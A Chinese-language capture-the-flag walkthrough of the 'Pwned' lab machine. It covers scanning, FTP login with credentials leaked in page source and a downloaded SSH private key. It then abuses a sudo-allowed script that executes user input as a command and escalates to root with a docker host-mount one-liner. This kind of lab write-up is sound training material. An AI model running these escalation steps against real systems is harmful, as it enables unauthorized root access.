社工(不是)

学习了docker提权

对信息收集有了更深的感悟

复习了sudo横向提权普通用户,shell脚本审计

了解了一段精彩的故事

nmap扫描

┌──(kali㉿kali)-[~/pwned]

└─$ cat nmapscan/*.nmap

# Nmap 7.95 scan initiated Wed Jul 23 23:27:31 2025 as: /usr/lib/nmap/nmap --privileged -sT -sC -sV -O -p21,22,80 -oA nmapscan/detail 192.168.140.230

Nmap scan report for 192.168.140.230

Host is up (0.0020s latency).

PORT   STATE SERVICE VERSION

21/tcp open  ftp     vsftpd 3.0.3

22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

| ssh-hostkey:

|   2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)

|   256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)

|_  256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)

80/tcp open  http    Apache httpd 2.4.38 ((Debian))

|_http-server-header: Apache/2.4.38 (Debian)

|_http-title: Pwned....!!

MAC Address: 08:00:27:E5:2A:A8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose|router

Running: Linux 4.X|5.X, MikroTik RouterOS 7.X

OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3

OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)

Network Distance: 1 hop

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Wed Jul 23 23:27:41 2025 -- 1 IP address (1 host up) scanned in 10.10 seconds

# Nmap 7.95 scan initiated Thu Jul 24 02:23:56 2025 as: /usr/lib/nmap/nmap --privileged -p- -oA ports 192.168.140.230

Nmap scan report for 192.168.140.230

Host is up (0.0024s latency).

Not shown: 65532 closed tcp ports (reset)

PORT   STATE SERVICE

21/tcp open  ftp

22/tcp open  ssh

80/tcp open  http

MAC Address: 08:00:27:E5:2A:A8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

# Nmap done at Thu Jul 24 02:24:14 2025 -- 1 IP address (1 host up) scanned in 18.53 seconds

# Nmap 7.95 scan initiated Wed Jul 23 23:30:21 2025 as: /usr/lib/nmap/nmap --privileged --script=vuln -p21,22,80 -oA nmapscan/vuln 192.168.140.230

Nmap scan report for 192.168.140.230

Host is up (0.0015s latency).

PORT   STATE SERVICE

21/tcp open  ftp

22/tcp open  ssh

80/tcp open  http

|_http-dombased-xss: Couldn't find any DOM based XSS.

|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

|_http-csrf: Couldn't find any CSRF vulnerabilities.

| http-enum:

|_  /robots.txt: Robots file

MAC Address: 08:00:27:E5:2A:A8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

# Nmap done at Wed Jul 23 23:30:52 2025 -- 1 IP address (1 host up) scanned in 31.64 seconds

ftp尝试匿名访问失败

遂访问80端口

web渗透

页面中写道这位attacker利用企业员工成功hack服务器

查看源码:该attacker注释中写道:



<!-- I forgot to add this on last note

     You are pretty smart as i thought

     so here i left it for you

     She sings very well. l loved it  -->

应该是无效信息

刚才nmap脚本扫描提示有robots.txt

访问:

# Group 1

User-agent: *

Allow: /nothing

访问nothing

查看源码:

扫描目录,dirb没有扫出额外信息

使用gobuster扫描的很慢

当时gobuster扫了很久没扫出额外信息

其他能够看的地方也都看过了

一般这种时候,引用一位老师的一句话:

当我把所有的信息都,每个方向的信息都努力去尝试,

结果发现就是没有找到相关的利用点,

没有一个checkpot切入点

那么我认为就是信息收集的还不够

所以这里,只有非常耐心的等待gobuster扫完(感觉是扫的最久的一次)

扫出了hidden_text目录

访问,有一个secret.dic,写道

把这个复制或下载下来作为字典在爆破一次目录

┌──(kali㉿kali)-[~/pwned]

└─$ gobuster dir -u http://192.168.140.230 -w dic.txt

===============================================================

Gobuster v3.6

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url:                     http://192.168.140.230

[+] Method:                  GET

[+] Threads:                 10

[+] Wordlist:                dic.txt

[+] Negative Status codes:   404

[+] User Agent:              gobuster/3.6

[+] Timeout:                 10s

===============================================================

Starting gobuster in directory enumeration mode

===============================================================

/pwned.vuln           (Status: 301) [Size: 323] [--> http://192.168.140.230/pwned.vuln/]

Progress: 21 / 22 (95.45%)

===============================================================

Finished

===============================================================

访问之后是一个登录界面

查看源码可以得到

<?php

//	if (isset($_POST['submit'])) {

//		$un=$_POST['username'];

//		$pw=$_POST['password'];

//

//	if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {

//		echo "welcome"

//		exit();

// }

// else

//	echo "Invalid creds"

// }

?>

这个参数值输入登录表单无响应

但是结合用户名为ftpuser,所以ftp尝试用这个用户密码连接

┌──(kali㉿kali)-[~/pwned]

└─$ ftp 192.168.140.230

Connected to 192.168.140.230.

220 (vsFTPd 3.0.3)

Name (192.168.140.230:kali): ftpuser

331 Please specify the password.

Password:

230 Login successful.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp>

连接成功

get所有能够获取的文件

┌──(kali㉿kali)-[~/pwned]

└─$ ftp 192.168.140.230

Connected to 192.168.140.230.

220 (vsFTPd 3.0.3)

Name (192.168.140.230:kali): ftpuser

331 Please specify the password.

Password:

230 Login successful.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ls

229 Entering Extended Passive Mode (|||28433|)

150 Here comes the directory listing.

drwxr-xr-x    2 0        0            4096 Jul 10  2020 share

226 Directory send OK.

ftp> cd share

250 Directory successfully changed.

ftp> ls

229 Entering Extended Passive Mode (|||63375|)

150 Here comes the directory listing.

-rw-r--r--    1 0        0            2602 Jul 09  2020 id_rsa

-rw-r--r--    1 0        0              75 Jul 09  2020 note.txt

226 Directory send OK.

ftp> mget *

mget id_rsa [anpqy?]? y

229 Entering Extended Passive Mode (|||44380|)

150 Opening BINARY mode data connection for id_rsa (2602 bytes).

100% |******************************|  2602      641.66 KiB/s    00:00 ETA

226 Transfer complete.

2602 bytes received in 00:00 (273.22 KiB/s)

mget note.txt [anpqy?]? y

229 Entering Extended Passive Mode (|||43452|)

150 Opening BINARY mode data connection for note.txt (75 bytes).

100% |******************************|    75       26.11 KiB/s    00:00 ETA

226 Transfer complete.

75 bytes received in 00:00 (9.35 KiB/s)

ftp> cd ../

250 Directory successfully changed.

ftp> ls

229 Entering Extended Passive Mode (|||33346|)

150 Here comes the directory listing.

drwxr-xr-x    2 0        0            4096 Jul 10  2020 share

226 Directory send OK.

ftp> cd ../

250 Directory successfully changed.

ftp> ls

229 Entering Extended Passive Mode (|||44849|)

150 Here comes the directory listing.

drwxrwx---    4 1000     1000         4096 Jul 10  2020 ariana

drwxrwxrwx    3 0        0            4096 Jul 09  2020 ftpuser

-rwxr-xr-x    1 0        0             367 Jul 10  2020 messenger.sh

drwxrwx---    4 1001     0            4096 Jul 24 14:02 selena

226 Directory send OK.

ftp> get messenger.sh

local: messenger.sh remote: messenger.sh

229 Entering Extended Passive Mode (|||7324|)

150 Opening BINARY mode data connection for messenger.sh (367 bytes).

100% |******************************|   367       88.47 KiB/s    00:00 ETA

226 Transfer complete.

367 bytes received in 00:00 (40.38 KiB/s)

ftp> quit

221 Goodbye.

查看获取的文件

┌──(kali㉿kali)-[~/pwned]

└─$ cat note.txt

Wow you are here 

ariana won't happy about this note 

sorry ariana :( 

┌──(kali㉿kali)-[~/pwned]

└─$ cat id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----

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

-----END OPENSSH PRIVATE KEY-----

note.txt和id_rsa在ftp的一个目录下,这说明这个id_rsa很可能是ariana的

┌──(kali㉿kali)-[~/pwned]

└─$ chmod 600 id_rsa 

┌──(kali㉿kali)-[~/pwned]

└─$ ssh ariana@192.168.140.230 -i id_rsa

Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent

permitted by applicable law.

Last login: Thu Jul 24 14:51:38 2025 from 192.168.140.132

ariana@pwned:~$

连接成功

此外还有一个文件messenger.sh,暂时还没用上

┌──(kali㉿kali)-[~/pwned]

└─$ cat messenger.sh

#!/bin/bash

clear

echo "Welcome to linux.messenger "

                echo ""

users=$(cat /etc/passwd | grep home |  cut -d/ -f 3)

                echo ""

echo "$users"

                echo ""

read -p "Enter username to send message : " name

                echo ""

read -p "Enter message for $name :" msg

                echo ""

echo "Sending message to $name "

$msg 2> /dev/null

                echo ""

echo "Message sent to $name :) "

                echo ""

可以注意到 $msg 2> /dev/null很有意思,它把我们输入的msg的内容作为命令输出

提权

枚举

ariana@pwned:~$ sudo -l

Matching Defaults entries for ariana on pwned:

    env_reset, mail_badpass,

    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:

    (selena) NOPASSWD: /home/messenger.sh

可以无密码的以selena用户的身份执行

我们之前已经分析了messenger.sh可以执行你输入的命令

所以这里执行时以selena的身份可以打开一个shell

ariana@pwned:~$ sudo -u selena /home/messenger.sh


Welcome to linux.messenger 

ariana:

selena:

ftpuser:

Enter username to send message : hhh

Enter message for hhh :bash

Sending message to hhh

id

uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)

whoami

selena

成功切换到selena用户,id看到docker

尝试docker提权

docker提权参考大佬文章:https://blog.csdn.net/nicai321/article/details/122266988

Sending message to hhh

id

uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)

whoami

selena

docker run -v /:/mnt -it alpine

/ # ls

bin    etc    lib    mnt    proc   run    srv    tmp    var

dev    home   media  opt    root   sbin   sys    usr

/ # cd mnt

/mnt # cd root

/mnt/root # id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

/mnt/root # whoami

root

/mnt/root # ls

root.txt

/mnt/root # cat root.txt

4d4098d64e163d2726959455d046fd7c

You found me. i dont't expect this (◎ . ◎)

I am Ajay (Annlynn) i hacked your server left and this for you.

I trapped Ariana and Selena to takeover your server :)

You Pwned the Pwned congratulations :)

share the screen shot or flags to given contact details for confirmation 

Telegram   https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g

Instgarm   ajs_walker 

Twitter    Ajs_walker

/mnt/root #

(这里切换到selena交互性不太好,我最初试着在反弹了一次shell,这样docker提权好像是无法成功的,要在ssh切换后这个shell docker提权)

这里相当于把环境挂载到mnt里了,所以要注意cd mnt后是cd root不是/root不然没东西

pwned 靶机WP的更多相关文章

  1. Raven: 2靶机入侵

    0x00 前言 Raven 2是一个中等难度的boot2root 虚拟靶机.有四个flag需要找出.在多次被攻破后,Raven Security采取了额外措施来增强他们的网络服务器安全以防止黑客入侵. ...

  2. 11. CTF综合靶机渗透(四)

    运行环境 Virtualbox (二选一) Vnware Workstation player 通关提示 Enumeration is key Try Harder Look in front of ...

  3. DC-2靶机

    DC-2 靶机获取:http://www.five86.com/ 靶机IP:192.168.43.197(arp-scan l) 攻击机器IP:192.168.43.199 在hosts文件里添加:1 ...

  4. mr-robot靶机练习

    在业余时间进行的靶机练习,也是根据网上的大牛做下来的,重复造轮子吧,但是个人感觉还是即使是造轮子也是需要自己动手呀,毕竟每个人做的过程中遇到的问题是不一样的,这样既可以帮助别人也能锻炼自己.希望可以帮 ...

  5. Vulnhub webdeveloper靶机渗透

    信息搜集 nmap -sP 192.168.146.0/24 #主机发现 nmap -A 192.168.146.148 #综合扫描 访问一下发现是wordpress,wp直接上wpscan wpsc ...

  6. Vulnhub DC-6靶机渗透

    信息搜集 nmap -sP 192.168.146.0/24 #找靶机ip nmap -sS -Pn -A 192.168.146.143 #扫描靶机信息 22和80端口,老朋友了. 先直接访问htt ...

  7. hacknos-player靶机渗透

    靶机下载地址https://www.vulnhub.com/entry/hacknos-player,459/ 网络配置 该靶机可能会存在无法自动分配IP的情况,所以无法扫描到的情况下需要手动配置获取 ...

  8. Acid靶机渗透

    Acid渗透靶机实战 攻击机:kali 192.168.41.147 靶机: acid 192.168.41.149 信息收集 ip发现 开启Acid靶机,通过nmap进行局域网存火主机扫描.![]( ...

  9. Bottleneck靶机渗透

    Bottleneck 端口扫描,主机发现. 敏感目录为:http://192.168.114.165/image_gallery.php 在该目录下发现:http://192.168.114.165/ ...

  10. LazySysAdmin 靶机渗透

    Vulnhub-LazySysAdmin 靶机渗透 发现六个开放的端口,分别为22,80,139,445,3306以及6667. 139/tcp open netbios-ssn Samba smbd ...

随机推荐

  1. Django实例(3)-用户连数据库登入系统

    App01--->urls.py from django.contrib import adminfrom django.conf.urls import urlfrom app01 impor ...

  2. Gin RBAC 权限基础实现

    RBAC (基于角色的访问控制) 是一种广泛应用的权限管理模型, 通过 角色 将 用户 和 权限 解耦, 简化权限分配管理. 用户 (User): 系统的使用者 权限 (Permission): 对资 ...

  3. SQL 强化练习 (七)

    继续 sql 练习, 不能停下来的哦, 通过这一系列的搬砖操作, 相信在日常业务的sql 应该是能达到相对清楚地写出来的, 尤其是我做数据分析这块, 感觉真的每天都要写才行, 之前都是用 Python ...

  4. 操作系统:Linux如何实现进程与进程调度

    Linux如何表示进程 在Cosmos中,设计了一个thread_t数据结构来代表一个进程,Linux也同样是用一个数据结构表示进程. Linux进程的数据结构 在Linux系统下,把运行中的应用程序 ...

  5. RPC实战与核心原理之动态代理了

    动态代理 回顾 用来解决两个应用之间的通信,而网络则是两台l两台机器之间的"桥梁",只有搭好桥梁才能把请求数据从一端传输到另一端,其中关键就是"可靠的传输" 背 ...

  6. L3-3、从单轮到链式任务:设计协作型 Prompt 系统

    一.链式任务设计的概念与价值 在人工智能应用开发中,单轮对话往往无法满足复杂业务场景的需求.链式任务设计允许我们将复杂问题分解为一系列相互关联的子任务,每个子任务的输出可以作为下一个子任务的输入,从而 ...

  7. L3-2、引导 AI 推理思考 —— 从条件判断到链式推理

    一.什么是引导式推理(Self-Reasoning Prompt)? 引导式推理是一种提示工程技术,通过特定的提示结构引导AI模型进行逐步推理,使其能够像人类一样"思考"问题,而非 ...

  8. Vue2和Vue3的差异化(通俗易懂)

    一.相同点 响应式系统(Reactive) 两者都采用 "模板 + 响应式" 的开发模式,视图自动随着状态变化而更新. 都支持双向绑定(v-model).条件渲染(v-if/v-s ...

  9. 京东正式开源Taro on HarmonyOS C-API 版本,为鸿蒙应用跨端开发提供高性能框架

    近日,京东正式开源了Taro on HarmonyOS C-API 版本,为鸿蒙应用跨端开发提供高性能框架.这次版本的发布,带来了更丰富的样式适配.更高效的渲染性能.更全面的组件支持,让开发者以Web ...

  10. 盘古信息PCB行业解决方案:以全域场景重构,激活智造新未来

    一.破局:PCB行业的时代之问 在数字经济蓬勃发展的浪潮中,PCB(印制电路板)作为 "电子产品之母",其重要性愈发凸显.随着 5G.人工智能等新兴技术的加速渗透,PCB行业面临着 ...